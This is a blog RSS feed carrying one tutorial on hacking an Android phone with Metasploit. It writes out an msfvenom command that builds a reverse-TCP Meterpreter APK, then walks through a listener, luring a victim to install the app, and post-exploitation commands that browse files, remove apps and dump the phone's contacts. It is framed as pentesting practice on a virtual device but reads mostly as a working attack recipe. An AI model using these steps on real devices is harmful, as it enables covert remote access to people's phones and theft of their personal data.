<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>mobile Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/tag/mobile/feed/" rel="self" type="application/rss+xml" />
	<link>https://kostacipo.stream/tag/mobile/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Mon, 26 Oct 2020 00:45:18 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>mobile Archives - Tech Chronicles</title>
	<link>https://kostacipo.stream/tag/mobile/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to Hack an Android Phone Using Metasploit Msfvenom in Kali Linux</title>
		<link>http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/</link>
					<comments>http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 26 Oct 2020 00:45:18 +0000</pubDate>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[mobile]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1824</guid>

					<description><![CDATA[<p>In this article, we are going to learn how to hack an Android phone using Metasploit framework. Android devices are growing very fast worldwide and actually using a lot of the core capabilities of Linux systems. That is why choosing Android is the best way to learn Mobile Penetration Testing. Here we are using Kali [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/">How to Hack an Android Phone Using Metasploit Msfvenom in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="tdb-block-inner td-fix-index">
<p>In this article, we are going to learn how to hack an Android phone using <a href="https://www.metasploit.com/">Metasploit</a> framework. Android devices are growing very fast worldwide and actually using a lot of the core capabilities of Linux systems. That is why choosing Android is the best way to learn Mobile <a href="https://searchsecurity.techtarget.com/definition/penetration-testing">Penetration Testing</a>.</p>
<p>Here we are using Kali Linux to attack the target. The target has set to be an Android Phone and for that we are using an Android virtual machine. Of course, there are going to be some limitations and differences between a virtual Android and a physical Android device but for the purpose of learning pentesting it is recommended to conduct this test on a virtual device.</p>
<p>We will use msfvenom for creating a payload and save it as an apk file. After generating the payload, we need to setup a listener to Metasploit framework. Once the target downloads and installs the malicious apk then, an attacker can easily get back a meterpreter session on Metasploit. An attacker needs to do some social engineering to install apk on the victim’s mobile device.</p>
<h3><strong>Step by step Tutorial</strong></h3>
<h5><strong>Generating a Payload with msfvenom</strong></h5>
<p>At first, fire up the Kali Linux so that we may generate an apk file as a malicious payload. We need to check our local IP that turns out to be ‘192.168.0.112’. You can also hack an Android device through Internet by using your Public/External IP in the LHOST and by port forwarding.</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter wp-image-6572 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Generating-a-Payload-with-msfvenom.png" sizes="(max-width: 632px) 100vw, 632px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Generating-a-Payload-with-msfvenom.png 632w, https://www.ehacking.net/wp-content/uploads/2020/04/Generating-a-Payload-with-msfvenom-300x161.png 300w" alt="Generating a Payload with msfvenom" width="632" height="340"></p>
<p>After getting your Local host IP use msfvenom tool that will generate a payload to penetrate the Android device. Type command:</p>
<p><strong># msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 R&gt; /var/www/html/ehacking.apk</strong></p>
<p>Where:</p>
<ul>
<li><strong>-p</strong> indicates a payload type</li>
<li><strong>android/metepreter/reverse_tcp</strong> specifies a reverse meterpreter shell would come in from a target Android device</li>
<li><strong>LHOST </strong>is your local IP</li>
<li><strong>LPORT</strong> is set to be as a listening port</li>
<li><strong>R&gt; /var/www/html</strong> would give the output directly on apache server</li>
<li><strong>apk</strong> is the final name of the final output</li>
</ul>
<p>This would take some time to generate an apk file of almost ten thousand bytes.</p>
<p><img decoding="async" class="aligncenter wp-image-6573 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/msfvenom.png" sizes="(max-width: 631px) 100vw, 631px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/msfvenom.png 631w, https://www.ehacking.net/wp-content/uploads/2020/04/msfvenom-300x77.png 300w" alt="msfvenom" width="631" height="162"></p>
<h4><strong>Launching an Attack</strong></h4>
<p>Before launching attack, we need to check the status of the apache server. Type command:</p>
<p><strong># service apache2 status</strong></p>
<p><img decoding="async" class="aligncenter wp-image-6574 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Launching-an-Attack.png" sizes="(max-width: 630px) 100vw, 630px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Launching-an-Attack.png 630w, https://www.ehacking.net/wp-content/uploads/2020/04/Launching-an-Attack-300x160.png 300w" alt="Launching an Attack" width="630" height="337"></p>
<p>All seems set, now fire up msfconsole. Use multi/handler exploit, set payload the same as generated prevoisly, set LHOST and LPORT values same as used in payload and finally type exploit to launch an attack.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6575 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/set-LHOST-and-LPORT.png" sizes="auto, (max-width: 648px) 100vw, 648px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/set-LHOST-and-LPORT.png 648w, https://www.ehacking.net/wp-content/uploads/2020/04/set-LHOST-and-LPORT-300x75.png 300w" alt="set LHOST and LPORT" width="648" height="162"></p>
<p>In real life scenarios, some social engineering techniques can be used to let the target download the malicious apk file. For demonstration we are just accessing the attacker machine to download the file in the Android device.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6576 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device..png" sizes="auto, (max-width: 799px) 100vw, 799px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device..png 799w, https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device.-300x132.png 300w, https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device.-768x337.png 768w, https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device.-696x306.png 696w" alt="download the file in the Android device." width="799" height="351"></p>
<p>After downloading it successfully, select the app to install.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6577 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/After-downloading-it-successfully-select-the-app-to-install..png" sizes="auto, (max-width: 519px) 100vw, 519px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/After-downloading-it-successfully-select-the-app-to-install..png 519w, https://www.ehacking.net/wp-content/uploads/2020/04/After-downloading-it-successfully-select-the-app-to-install.-300x173.png 300w" alt="After downloading it successfully, select the app to install." width="519" height="299"></p>
<p>So far, this option has been seen frequently when we try to install some third-party apps and normally users wont hesitate to allow the installation from unknown sources.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6578 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources..png" sizes="auto, (max-width: 799px) 100vw, 799px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources..png 799w, https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources.-300x164.png 300w, https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources.-768x419.png 768w, https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources.-696x380.png 696w, https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources.-770x420.png 770w" alt="the installation from unknown sources." width="799" height="436">Enable the settings to install applications from the third-party sources. And finally hit the install option at the bottom.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6579 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications.png" sizes="auto, (max-width: 800px) 100vw, 800px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications.png 800w, https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications-300x246.png 300w, https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications-768x630.png 768w, https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications-696x571.png 696w, https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications-512x420.png 512w" alt="Enable the settings to install applications " width="800" height="656">Once the user installs the application and runs it, the meterepreter session would be opened immediatly at the attacking side.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6580 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/opened-immediatly.png" sizes="auto, (max-width: 634px) 100vw, 634px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/opened-immediatly.png 634w, https://www.ehacking.net/wp-content/uploads/2020/04/opened-immediatly-300x58.png 300w" alt="opened immediatly" width="634" height="123"></p>
<h4><strong>Post Exploitation </strong></h4>
<p>Type “background” and then “sessions” to list down all the sessions from where you can see all the IPs connected to the machine.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6581 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Post-Exploitation.png" sizes="auto, (max-width: 638px) 100vw, 638px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Post-Exploitation.png 638w, https://www.ehacking.net/wp-content/uploads/2020/04/Post-Exploitation-300x113.png 300w" alt="Post Exploitation" width="638" height="240"></p>
<p>You can interact with any session by typing <strong>sessions -i [session ID]</strong></p>
<p>After entering the session, type “help” to list down all the commands we can put forward in this session.</p>
<p>You can see some file system commands that are helpful when you’re trying to go after some sensitive information or data. By using these, You can easily download or upload any file or information.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6582 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/file-system-commands.png" sizes="auto, (max-width: 632px) 100vw, 632px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/file-system-commands.png 632w, https://www.ehacking.net/wp-content/uploads/2020/04/file-system-commands-300x191.png 300w" alt="file system commands" width="632" height="402">You will also find some network commands including portfwd and route</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6583 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/portfwd.png" sizes="auto, (max-width: 629px) 100vw, 629px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/portfwd.png 629w, https://www.ehacking.net/wp-content/uploads/2020/04/portfwd-300x89.png 300w" alt="portfwd" width="629" height="186"></p>
<p>Some powerful system commands to get user ID, get a shell or getting the complete system information.</p>
<p>Type “app_list” and it will show you all the installed apps on the device</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6584 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Type-“app_list”-and-it-will-show-you-all-the-installed-apps-on-the-device.png" sizes="auto, (max-width: 628px) 100vw, 628px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Type-“app_list”-and-it-will-show-you-all-the-installed-apps-on-the-device.png 628w, https://www.ehacking.net/wp-content/uploads/2020/04/Type-“app_list”-and-it-will-show-you-all-the-installed-apps-on-the-device-300x198.png 300w" alt="Type “app_list” and it will show you all the installed apps on the device" width="628" height="414">We also have the power to uninstall any app from the Android device</p>
<p><strong><img loading="lazy" decoding="async" class="aligncenter wp-image-6585 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/We-also-have-the-power-to-uninstall-any-app-from-the-Android-device.png" sizes="auto, (max-width: 631px) 100vw, 631px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/We-also-have-the-power-to-uninstall-any-app-from-the-Android-device.png 631w, https://www.ehacking.net/wp-content/uploads/2020/04/We-also-have-the-power-to-uninstall-any-app-from-the-Android-device-300x81.png 300w" alt="We also have the power to uninstall any app from the Android device" width="631" height="170"></strong></p>
<h4><strong>Extracting Contacts from an Android Device</strong></h4>
<p>Now let extract some contacts from the target device by typing “dump” and double tab</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6586 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Extracting-Contacts-from-an-Android-Device.png" sizes="auto, (max-width: 626px) 100vw, 626px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Extracting-Contacts-from-an-Android-Device.png 626w, https://www.ehacking.net/wp-content/uploads/2020/04/Extracting-Contacts-from-an-Android-Device-300x19.png 300w" alt="Extracting Contacts from an Android Device" width="626" height="39">It will show all the options to extract from the device. Type “dump_contacts” and enter</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6587 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/dump-contacts.png" sizes="auto, (max-width: 628px) 100vw, 628px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/dump-contacts.png 628w, https://www.ehacking.net/wp-content/uploads/2020/04/dump-contacts-300x35.png 300w" alt="dump_contacts" width="628" height="73">It will extract all the contacts from the Android device and will save it in our local directory. To see this file type “ls” and “cat [file_name]”</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6588 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/cat-file_name.png" sizes="auto, (max-width: 624px) 100vw, 624px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/cat-file_name.png 624w, https://www.ehacking.net/wp-content/uploads/2020/04/cat-file_name-300x176.png 300w" alt="" width="624" height="367">This would show the content of the contact’s file earlier downloaded from the target device. This information is really sensitive and could be exploited by hackers.</p>
<p>There are lots of more commands available in meterpreter. Further try to explore and learn what we can perform with an Android device. This concludes that we have successfully penetrated the Android device using Kali Linux and Metasploit-Framework.</p>
<p>A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.</p>
</div>
<p>The post <a href="http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/">How to Hack an Android Phone Using Metasploit Msfvenom in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
